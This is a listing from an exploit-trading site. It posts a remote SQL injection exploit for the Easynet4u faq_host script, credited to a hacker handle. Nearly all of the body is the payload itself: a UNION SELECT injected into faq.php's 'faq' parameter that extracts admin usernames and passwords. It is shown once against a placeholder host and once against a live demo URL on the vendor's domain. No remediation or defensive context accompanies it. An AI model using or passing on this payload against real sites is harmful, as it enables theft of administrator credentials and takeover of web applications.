[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Easynet4u faq Host (faq.php faq) Remote SQL Injection Vulnerability

Author
SuB-ZeRo
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3871
Category
web applications
Date add
09-10-2008
Platform
unsorted
===================================================================
Easynet4u faq Host (faq.php faq) Remote SQL Injection Vulnerability
===================================================================


############### >>> Remote SQL Injection <<<  #########
##    CoNsTaNtiNe HaCkErS25                         ##
################## >>> SuB-ZeRo  <<< ################
 author  :  SuB-ZeRo(AlGeRiA-HaCkErS)           
 script  : faq_host script
 download: http://www.easynet4u.com/easyshop/index.php?do=catalog&c=remotely_hosted_scripts&i=faq_host
 dork    : find it
 exploit:
 www.site.me/script/faq.php?faq=1+union+select+1,2,concat(username,0x3a,password),4,5,6+from+admin--
 L!Ve DeMo
 http://www.easynet4u.com/faqs/faq.php?faq=1+union+select+1,2,concat(username,0x3a,password),4,5,6+from+admin--




#  0day.today [2024-12-24]  #